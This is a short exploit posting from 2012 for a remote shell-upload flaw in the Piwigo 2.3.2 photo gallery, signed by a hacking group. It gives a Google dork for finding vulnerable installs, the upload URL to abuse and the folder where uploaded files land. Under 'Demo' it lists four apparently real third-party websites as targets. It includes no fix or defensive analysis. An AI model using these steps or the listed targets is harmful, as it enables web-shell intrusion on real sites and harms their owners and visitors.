Piwigo version 2.3.2 suffers from a shell upload vulnerability.
9e73534ab9a6a6946cad37d6459f7da80799f23f5ff7770e76a8985bc7e8cde9
#### # Exploit Title: piwigo 2.3.2 Remote File Upload
# Author: T0x!c
# Date : 26-02-2012
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category:: webapps
# Google Dork:inurl:"index.php?/add_photos""
# Vendor: https://www.phpsources.org/description-script-Piwigo_15.htm
# Version: 2.3.2
# Tested on: [Windows Xp]
####
# Exploit :
https://127.0.0.1/Path/index.php?/add_photos
# Demo :
https://mikacourir.com/piwigo/index.php?/add_photos
https://labeille49.fr/galerie/index.php?/add_photos
https://www.heretiques.org/album/index.php?/add_photos
https://templiers-noirs.com/galerie/index.php?/add_photos
# File UpLoaded In :
https://127.0.0.1/Path/upload/
=================================**AlgeriansHackers**==================================
# Greets To : KedAns-Dz * Caddy-Dz * Kha&miX * Jago-dz * Nassim24Missil * Kalashinkov * (exploit-id.com) , (1337day.com) , (dis9.com) , (Dz-Team.biz) =======================================================================================